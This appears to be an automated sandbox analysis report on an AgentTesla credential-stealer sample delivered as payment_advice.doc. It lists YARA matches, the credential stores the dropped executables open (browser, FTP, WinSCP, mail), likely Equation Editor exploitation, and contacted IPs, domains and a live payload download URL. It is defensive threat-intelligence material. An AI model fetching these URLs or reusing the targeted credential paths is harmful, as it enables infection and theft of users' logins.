Source: Yara match File source: 00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UGxXf.exe PID: 2500, type: MEMORY
Source: Yara match File source: Process Memory Space: twox67345.exe PID: 2292, type: MEMORY
Source: Yara match File source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY
Source: Yara match File source: 11.2.UGxXf.exe.39bd920.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.twox67345.exe.38b4700.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.twox67345.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.UGxXf.exe.3974700.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.twox67345.exe.38fd920.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.UGxXf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.UGxXf.exe.3974700.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.twox67345.exe.38fd920.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.UGxXf.exe.39bd920.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.twox67345.exe.38b4700.9.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Roaming\twox67345.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\twox67345.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UGxXf.exe PID: 2500, type: MEMORY
Source: Yara match File source: Process Memory Space: twox67345.exe PID: 2292, type: MEMORY
Source: Yara match File source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY
Source: Yara match File source: 11.2.UGxXf.exe.39bd920.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.twox67345.exe.38b4700.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.twox67345.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.UGxXf.exe.3974700.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.twox67345.exe.38fd920.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.UGxXf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.UGxXf.exe.3974700.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.twox67345.exe.38fd920.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.UGxXf.exe.39bd920.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.twox67345.exe.38b4700.9.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 356799 Sample: payment_advice.doc Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 58 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->58 60 Found malware configuration 2->60 62 Antivirus detection for URL or domain 2->62 64 10 other signatures 2->64 8 EQNEDT32.EXE 11 2->8         started        13 UGxXf.exe 12 1 2->13         started        15 UGxXf.exe 2->15         started        17 WINWORD.EXE 291 23 2->17         started        process3 dnsIp4 50 tunedinblog.com 150.95.81.183, 49165, 80 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG Singapore 8->50 40 C:\Users\user\AppData\Roaming\twox67345.exe, PE32 8->40 dropped 42 C:\Users\user\AppData\Local\...\twox[1].exe, PE32 8->42 dropped 82 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->82 19 twox67345.exe 12 1 8->19         started        52 coroloboxorozor.com 13->52 84 Multi AV Scanner detection for dropped file 13->84 86 Machine Learning detection for dropped file 13->86 88 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 13->88 90 2 other signatures 13->90 23 UGxXf.exe 2 13->23         started        25 cmd.exe 13->25         started        54 coroloboxorozor.com 15->54 file5 signatures6 process7 dnsIp8 46 coroloboxorozor.com 172.67.172.17, 49166, 49168, 49169 CLOUDFLARENETUS United States 19->46 66 Multi AV Scanner detection for dropped file 19->66 68 Machine Learning detection for dropped file 19->68 70 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 19->70 78 2 other signatures 19->78 27 twox67345.exe 1 4 19->27         started        32 cmd.exe 19->32         started        34 twox67345.exe 19->34         started        48 mail.tpcdel.com 23->48 72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->72 74 Tries to steal Mail credentials (via file access) 23->74 76 Tries to harvest and steal ftp login credentials 23->76 80 3 other signatures 23->80 36 timeout.exe 25->36         started        signatures9 process10 dnsIp11 56 mail.tpcdel.com 103.35.120.75, 49167, 49170, 49171 STPI-NOIDASoftwareTechnologyParksofIndiaBlock-IVIN India 27->56 44 C:\Users\user\AppData\Roaming\...\UGxXf.exe, PE32 27->44 dropped 92 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->92 94 Tries to steal Mail credentials (via file access) 27->94 96 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->96 98 Installs a global keyboard hook 27->98 38 timeout.exe 32->38         started        file12 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.172.17
 unknown United States
13335 CLOUDFLARENETUS false
150.95.81.183
 unknown Singapore
135161 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG true
103.35.120.75
 unknown India
9430 STPI-NOIDASoftwareTechnologyParksofIndiaBlock-IVIN true

Contacted Domains

Name IP Active
mail.tpcdel.com 103.35.120.75 true
coroloboxorozor.com 172.67.172.17 true
tunedinblog.com 150.95.81.183 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://coroloboxorozor.com/base/4AE44766E50C275550C63C95498C19FE.html false
  • Avira URL Cloud: safe
 unknown
http://tunedinblog.com/wp-includes/twox.exe true
  • Avira URL Cloud: malware
 unknown
http://coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html false
  • Avira URL Cloud: safe
 unknown
https://n2pGpXVLT5FR.net true
  • Avira URL Cloud: safe
 unknown